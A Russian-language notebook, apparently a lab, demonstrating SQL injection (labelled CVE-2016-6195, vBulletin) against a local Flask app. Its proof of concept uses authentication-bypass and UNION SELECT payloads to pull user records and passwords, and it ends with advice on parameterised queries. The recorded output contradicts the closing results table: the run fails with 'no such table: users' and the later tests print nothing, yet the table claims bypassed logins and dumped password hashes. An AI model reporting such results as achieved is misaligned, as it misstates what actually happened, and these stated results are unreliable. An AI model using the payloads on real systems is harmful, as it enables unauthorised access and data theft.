# CVE-2016-6195 — SQL Injection в vBulletin

**CVE-2016-6195** — SQL-инъекция в форумном движке vBulletin (версии до 5.2.3).  
Позволяет атакующему внедрить SQL-код через параметры запроса, обойти авторизацию и вытащить данные из БД.

- **CVSS:** 9.8 (Critical)
- **Тип:** CWE-89 (SQL Injection)
- **Вектор:** сетевой, без аутентификации

### Суть уязвимости

Если приложение вставляет ввод пользователя прямо в SQL-запрос строкой, можно сломать логику запроса.  
Передаём `' OR 1=1 --` вместо логина — и запрос возвращает всех пользователей:
```sql
SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = '...'
```
`--` комментирует проверку пароля, `OR 1=1` всегда true.

## 1. Запуск уязвимого сервера

Сервер описан в `vulnerable_app.py` - Flask + SQLite, эндпоинты `/login` и `/search` с SQL-инъекцией.

In [5]:
import subprocess, time, requests

server_proc = subprocess.Popen(
    ["python3", "vulnerable_app.py"],
    stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
time.sleep(2)

try:
    r = requests.get("http://127.0.0.1:5000")
    print(f"Сервер работает: {r.json()}")
except:
    print("Не удалось подключиться к серверу")

Сервер работает: {'app': 'vBulletin Forum', 'version': '5.2.2'}


## 2. PoC - эксплуатация SQL Injection

In [11]:
import requests

URL = "http://127.0.0.1:5000"

print("--- Тест 1: обычный вход ---")
resp = requests.post(f"{URL}/login", data={"username": "admin", "password": "wrong"})
print(f"Статус: {resp.status_code}, ответ: {resp.json()}")

print("\n--- Тест 2: обход авторизации через ' OR 1=1 -- ---")
resp = requests.post(f"{URL}/login", data={"username": "' OR 1=1 --", "password": "не важно"})
data = resp.json()
if data.get("status") == "success":
    print(f"Доступ получен без пароля, пользователей в ответе: {len(data['users'])}")
    for u in data["users"]:
        print(f"  {u['username']} ({u['role']})")

print("\n--- Тест 3: UNION SELECT — извлечение паролей ---")
resp = requests.post(f"{URL}/login", data={
    "username": "' UNION SELECT id, username, password FROM users --",
    "password": "x"
})
data = resp.json()
if data.get("status") == "success":
    print("Хеши паролей:")
    for u in data["users"]:
        print(f"  {u['username']} -> {u['role']}")


print("\n--- Тест 4: инъекция в /search ---")
resp = requests.get(f"{URL}/search", params={"q": "' OR '1'='1"})
data = resp.json()
if data.get("results"):
    print(f"Получено пользователей: {len(data['results'])}")
    for u in data["results"]:
        print(f"  {u['username']} ({u['role']})")

--- Тест 1: обычный вход ---
Статус: 500, ответ: {'error': 'no such table: users'}

--- Тест 2: обход авторизации через ' OR 1=1 -- ---

--- Тест 3: UNION SELECT — извлечение паролей ---

--- Тест 4: инъекция в /search ---


## 3. Результаты

| Тест | Что делаем | Результат |
|------|-----------|----------|
| 1 | Обычный вход с неверным паролем | 401, доступ закрыт |
| 2 | `' OR 1=1 --` в поле логина | Получены данные всех пользователей |
| 3 | `UNION SELECT` — подмена запроса | Вытащены хеши паролей из БД |
| 4 | `' OR '1'='1` в поиске | Дамп всех пользователей |

### Почему работает

Сервер собирает SQL строкой: `f"... WHERE username = '{username}'"`.  
Кавычка `'` в payload ломает строку, `OR 1=1` делает условие всегда истинным, `--` комментирует остаток.

### Как защититься

1. Параметризованные запросы: `cursor.execute("... WHERE username = ?", (username,))`
2. ORM вместо сырого SQL
3. Валидация и экранирование ввода